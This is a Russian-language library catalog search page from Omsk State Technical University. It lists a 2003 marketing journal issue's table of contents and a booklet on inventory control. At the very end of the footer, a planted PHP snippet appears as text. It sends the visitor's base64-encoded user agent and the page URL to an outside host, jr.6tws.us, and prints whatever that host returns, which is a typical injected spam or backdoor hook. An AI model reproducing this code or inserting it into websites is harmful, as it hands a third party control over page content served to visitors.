Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

123 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Запас товара")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 2
1. 
Маркетинг в России и за рубежом. - Журнал, 2003г. № 3
Оглавление 
  • Атаманов, Д. Ю. Распределение затрат при калькуляции себестоимости традиционным и операционно-ориентированным методом / Д. Ю. Атаманов. - с.3-17 : ил.
    Кл. слова: Себестоимость продукта, Калькуляция себестоимости, АВС-анализ
  • Баутов, А. Н. Формирование и расчет оптимального ассортимента при случайном спросе / А. Н. Баутов. - с.18-32 : ил.
    Кл. слова: Стратегия снабжения, Запас товара, Прогнозирование спроса
  • Солошенко, М. В. Стоимость маркетинговой информации в условиях неопределенности / М. В. Солошенко. - с.33-42 : ил.
    Кл. слова: Информация, Цена информации
  • Вилкова, С. А. Исследование рынка бытовых гигиенических средств и региональных потребительских предпочтений / С. А. Вилкова. - с.43-51 : ил.
    Кл. слова: СМС, Чистящее средство, Моющее средство
  • Ерчак, А. И. Анализ предельных величин коэффициента эластичности продаж от цены в практике торгового предприятия / А. И. Ерчак. - с.53-56 : табл.
  • Петросян, А. А. Некоторые аспекты тактического ценообразования / А. А. Петросян. - с.57-62 : ил.
  • Белый, Е. М. Ценообразование на образовательные услуги в государственных вузах / Е. М. Белый, И. Б. Романова. - с.63-72 : ил.
    Кл. слова: ОУ, Цена образовательной услуги
  • Федоров, Д. С. Неформальные маркетинговые коммуникации: новые перспективы на российском рынке / Д. С. Федоров. - с.73-78
  • Оганесян, А. С. Анализ и управление эффективностью рекламы / А. С. Оганесян, И. А. Оганесян. - с.79-89 : табл.
  • Гранкина, Н. А. Разработка внешнеэкономической стратегии сбыта продукции / Н. А. Гранкина, Е. В. Попов. - с.90-102 : ил.
    Кл. слова: Канал сбыта, Охват рынка
  • Копаева, Е. А. Формы и методы торговли парфюмерно-косметическими средствами / Е. А. Копаева. - с.103-111
    Кл. слова: Косметика, Парфюмерия, Реализация косметики и парфюмерии
  • Рамазанов, И. А. Атмосфера магазина и формирующие ее факторы / И. А. Рамазанов, М. А. Николаева. - с.112-122 : ил.
    Кл. слова: Магазин
  • Голубкова, Е. Н. Внедрение концепции CRM на предприятии / Е. Н. Голубкова, Д. М. Давтян. - с.123-131 : ил.
    Кл. слова: CRM
2. 
Контроль запасов [Текст] : Для студентов эконом. специальностей вузов: Пер. с англ., 1993. - 62 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3080 - 15.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.67 с.14 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;